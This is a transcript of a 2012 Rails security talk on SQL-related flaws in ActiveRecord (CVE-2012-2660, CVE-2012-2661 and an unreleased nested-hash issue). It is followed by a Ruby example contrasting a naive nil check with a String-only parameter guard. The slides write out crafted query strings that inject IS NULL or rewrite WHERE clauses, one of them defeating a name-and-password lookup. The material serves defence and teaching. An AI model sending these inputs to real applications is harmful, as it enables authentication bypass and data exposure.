"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
Transcript
Rails Vulnerabilities Last Week
CVE-2012-2660
CVE-2012-2661

CVE-2012-2660
Allows unexpected "IS NULL" in queries
Affects Rails 2.x and 3.x

ActiveRecord Query
  unless params[:name].nil?
    @user = User.where(:name => params[:name])
  end

Query Parameters
  ?name[]
  {"name"=>[nil]}

ActiveRecord Query
  unless [nil].nil?
    @user = User.where(:name => [nil])
  end

Resulting SQL
  SELECT "users".* FROM "users" WHERE "users"."name" IS NULL

CVE-2012-2661
Allows some manipulation of WHERE clause via "dotted" query keys
Affects Rails 3.x

ActiveRecord Query
  User.where(:name => params[:name])

ActiveRecord Query
  User.where("users.name" => params[:name])

Query Parameters
  ?name[users.id]=1
  {"name"=>{"users.id"=>"1"}}

ActiveRecord Query
  User.where(:name => {"users.id" => "1"})

Resulting SQL
  SELECT "users".* FROM "users" WHERE "users"."id" = 1

Unreleased Vulnerability
Allows some manipulation of WHERE clause via nested hashes in query values
Affects 2.3.x and 3.x

ActiveRecord Query
  User.where(:name => params[:name], :password => params[:password])

Query Parameters
  ?name[users][id]=1&password[users][id]=1
  {"name"=>{"users"=>{"id"=>"1"}}, "password"=>{"users"=>{"id"=>"1"}}}

ActiveRecord Query
  User.where(:name => {"users"=>{"id"=>"1"}}, :password => {"users"=>{"id"=>"1"}})

Resulting SQL
  SELECT "users".* FROM "users" WHERE "users"."id" = 1 AND "users"."id" = 1
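All three slides share one root cause: the query-string parser turns `name[]`, `name[users.id]=1` and `name[users][id]=1` into an Array or a Hash, and a `.nil?` check lets those shapes reach `where`. The example below is added here and is not from the deck; it uses a small stdlib-only re-implementation of Rack's nested-query parsing (an assumption that covers only the shapes on the slides) to show the three parameter values the slides list, then contrasts the slide's `.nil?` guard with a guard that only accepts a plain String.

```ruby
require "cgi"

# Simplified model of Rack's nested query parsing (assumption: handles only
# plain keys, "key[]" and "key[a][b]" forms, which is all the slides need).
def parse_nested_query(query)
  params = {}
  query.sub(/\A\?/, "").split("&").each do |pair|
    raw_key, raw_value = pair.split("=", 2)
    value = raw_value.nil? ? nil : CGI.unescape(raw_value)   # "name[]" has no value -> nil
    name, *subkeys = CGI.unescape(raw_key).scan(/\A[^\[]+|\[[^\]]*\]/)
    subkeys.map! { |s| s[1..-2] }                             # "[users]" -> "users", "[]" -> ""
    assign(params, name, subkeys, value)
  end
  params
end

def assign(container, key, subkeys, value)
  if subkeys.empty?
    container[key] = value                                    # scalar: "name=bob"
  elsif subkeys.first == ""
    (container[key] ||= []) << value                          # "name[]" -> Array (here [nil])
  else
    assign(container[key] ||= {}, subkeys.first, subkeys.drop(1), value)  # nested Hash
  end
end

# The guard from the CVE-2012-2660 slide: only an absent key is rejected, so
# an Array such as [nil] or a Hash such as {"users.id"=>"1"} still reaches `where`.
def naive_guard_allows?(params)
  !params["name"].nil?
end

# Hardened variant: a value is usable only if it is a String; Arrays and Hashes
# (the shapes that rewrite the WHERE clause in the slides) are refused.
def scalar_param(params, key)
  value = params[key]
  value.is_a?(String) ? value : nil
end

def hardened_guard_allows?(params)
  !scalar_param(params, "name").nil?
end

# Constructed query strings taken from the slides, for a quick side-by-side run.
SLIDE_QUERIES = ["?name=bob", "?name[]", "?name[users.id]=1", "?name[users][id]=1&password[users][id]=1"]
SLIDE_QUERIES.each do |q|
  p = parse_nested_query(q)
  puts "#{q.ljust(42)} parsed=#{p.inspect} naive=#{naive_guard_allows?(p)} hardened=#{hardened_guard_allows?(p)}"
end
```

In a real controller the same type check belongs before the value is handed to `where`, or the parameter is cast explicitly with `params[:name].to_s` only after confirming it is a String.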